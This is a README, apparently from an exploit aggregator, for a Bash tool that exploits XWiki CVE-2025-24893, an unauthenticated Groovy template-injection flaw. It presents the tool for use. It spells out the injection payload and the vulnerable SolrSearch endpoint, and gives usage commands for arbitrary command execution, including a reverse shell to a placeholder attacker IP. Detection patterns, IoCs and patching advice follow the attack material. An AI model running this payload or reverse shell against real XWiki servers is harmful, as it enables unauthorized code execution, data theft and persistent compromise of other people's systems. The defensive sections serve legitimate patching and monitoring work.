Share
## https://sploitus.com/exploit?id=A354FCE5-453C-5B48-AE5E-B31ED578A654
# XWiki Platform Unauthenticated RCE Exploit

## Overview
This script is a refurbished Bash implementation of an exploit targeting the XWiki Platform versions affected by CVE-2025-24893. It leverages a critical unauthenticated remote code execution vulnerability that allows attackers to execute arbitrary Groovy code via a template injection flaw in the SolrSearch macro.

The original exploit implementations in Python were created by various security researchers and are adapted here for Bash users with simplified execution and enhanced usability.

## Vulnerability Details
- **Discoverer**: John Kwak (Trend Micro's Zero Day Initiative)
- **CVE**: [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
- **CVSS Score**: 9.8 (Critical)
- **References**:
  - [XWiki Official Security Advisory (GHSA-rr6p-3pfg-562j)](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j)
  - [CISA Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
  - [VulnCheck - XWiki CVE-2025-24893 Exploited in the Wild](https://www.vulncheck.com/blog/xwiki-cve-2025-24893-eitw)
  - [OffSec Blog - Unauthenticated RCE in XWiki](https://www.offsec.com/blog/cve-2025-24893/)
- **Description**: The vulnerability stems from improper input sanitization in the SolrSearch macro within XWiki Platform. The macro fails to properly validate and sanitize user-supplied input in the `text` parameter when accessed via the RSS media endpoint, allowing attackers to inject malicious Groovy code into the rendering pipeline without authentication.

## Affected & Patched Versions
### Affected Versions
- **XWiki Platform**: 5.3-milestone-2 through 15.10.10
- **XWiki Platform**: 16.0.0-rc-1 through 16.4.0

### Patched Versions
- **XWiki 15.10.11** or later
- **XWiki 16.4.1** or later
- **XWiki 16.5.0RC1** or later

## Features
- **Unauthenticated RCE**: Execute arbitrary system commands without authentication.
- **CSRF Token Bypass**: Exploits template injection without requiring CSRF tokens.
- **Background Execution**: Runs commands asynchronously on the target server.
- **Simple Command-Line Interface**: Easy-to-use Bash script with minimal dependencies.

## Prerequisites
- **Dependencies**:
  - `curl`: For sending HTTP requests.
  - `jq`: For URL encoding the payload.
  - Bash shell.
- **Tested Environment**: Linux OS with Bash.

## Usage
Provide the Execution permissions:

```bash
chmod +x CVE-2025-24893
```

Run the script with the required arguments:

```bash
./CVE-2025-24893  
```

### Parameters
| Parameter       | Description                                      |
|------------------|--------------------------------------------------|
| ``  | The target XWiki URL (e.g., `http://example.com` or `https://xwiki.example.org`). Protocol is optional. |
| ``     | The system command to execute on the target server. |

### Example
**Check if target is vulnerable (execute `id` command):**
```bash
./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"
```

**Retrieve system information:**
```bash
./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"
```

**Create a test file:**
```bash
./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"
```

**Reverse shell (replace with your IP and port):**
```bash
./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"
```

## Script Workflow

1. **Command-line Argument Parsing**:
   - Validates that both target URL and command are provided.
   - Normalizes the URL by adding `http://` if no protocol is specified.

2. **Payload Construction**:
   - Builds a Groovy code payload that executes the specified command using `.execute()`.
   - Wraps the payload in XWiki macro syntax: `}}}{{async async=false}}{{groovy}}{{/groovy}}{{/async}}`

3. **URL Encoding**:
   - URL-encodes the payload using `jq` for proper HTTP transmission.

4. **Exploitation**:
   - Sends an HTTP GET request to the vulnerable SolrSearch endpoint: `/xwiki/bin/get/Main/SolrSearch?media=rss&text=`
   - Command executes in the background on the target server.

## Technical Details

### Exploitation Mechanism

The exploit chain works as follows:

1. **Template Injection**: The attacker crafts a malicious payload containing Groovy code wrapped in XWiki macro syntax.
2. **Endpoint Targeting**: The payload is sent to the vulnerable SolrSearch RSS endpoint.
3. **Code Execution**: The injected Groovy code is executed server-side without authentication.
4. **System Compromise**: The attacker gains arbitrary code execution with the privileges of the XWiki application.

### Payload Structure

```groovy
}}}{{async async=false}}{{groovy}}''.execute();{{/groovy}}{{/async}}
```

- `}}}` - Closes any existing macro context
- `{{async async=false}}` - Ensures synchronous execution
- `{{groovy}}...{{/groovy}}` - Wraps the malicious Groovy code
- `''.execute();` - Executes the specified system command

## Proof of Concept

### Vulnerable Environment Setup

For testing purposes, you can set up a vulnerable XWiki instance using Docker:

```bash
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10
```

### Exploitation Demo

```bash
# Wait for XWiki to start (may take 1-2 minutes)
./CVE-2025-24893 http://localhost:8080 "whoami"
```

## Impact

Successful exploitation of this vulnerability allows an unauthenticated attacker to:

- Execute arbitrary system commands on the server
- Read, modify, or delete sensitive data
- Compromise the entire XWiki installation
- Pivot to other systems on the network
- Deploy cryptocurrency miners or other malware
- Establish persistent backdoor access

## Real-World Exploitation

According to CISA and multiple security vendors:

- **Active Exploitation**: CVE-2025-24893 is being actively exploited in the wild
- **Attack Campaigns**: VulnCheck detected two-stage attack chains deploying cryptocurrency miners
- **CISA KEV Catalog**: Added to Known Exploited Vulnerabilities catalog on October 30, 2025
- **Widespread Scanning**: Mass internet-wide scanning for vulnerable instances

## Detection & Mitigation

### Detection

Monitor for suspicious requests to the SolrSearch endpoint:

```
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*
```

Look for patterns containing:
- `{{groovy}}`
- `{{async}}`
- `.execute()`
- URL-encoded variations of the above

### Indicators of Compromise (IoCs)

- Unexpected processes spawned by the XWiki application user
- New files in `/tmp` or other writable directories
- Outbound network connections to unknown IPs
- Cryptocurrency mining processes (high CPU usage)

### Mitigation

1. **Upgrade XWiki** to a patched version:
   - Version 15.10.11 or later
   - Version 16.4.1 or later
   - Version 16.5.0RC1 or later

2. **Apply Temporary Workarounds** (if immediate patching is not possible):
   - Restrict access to the SolrSearch endpoint via Web Application Firewall (WAF)
   - Disable the SolrSearch macro if not required
   - Implement network segmentation to limit exposure

3. **Monitor for Compromise**:
   - Review logs for exploitation attempts
   - Check for unauthorized file modifications
   - Scan for cryptocurrency miners and backdoors

## Limitations
- Commands execute in the background; output may not be immediately visible.
- Verification of command execution requires side-channel methods (e.g., creating files, network connections).
- Requires the target to have the SolrSearch macro enabled (default configuration).

## Credits
- **Vulnerability Discoverer**: John Kwak (Trend Micro's Zero Day Initiative)
- **Original Python Exploit Authors**: Various security researchers
- **Adapted Script**: Refurbished by [0xdtc] Built in BASH

## Disclaimer
This script is for **educational purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal and unethical. Use responsibly.

**You must have explicit written permission from the system owner before testing.**

The author(s) of this tool are not responsible for any misuse or damage caused by this script. Users are solely responsible for ensuring they have proper authorization and comply with all applicable laws and regulations.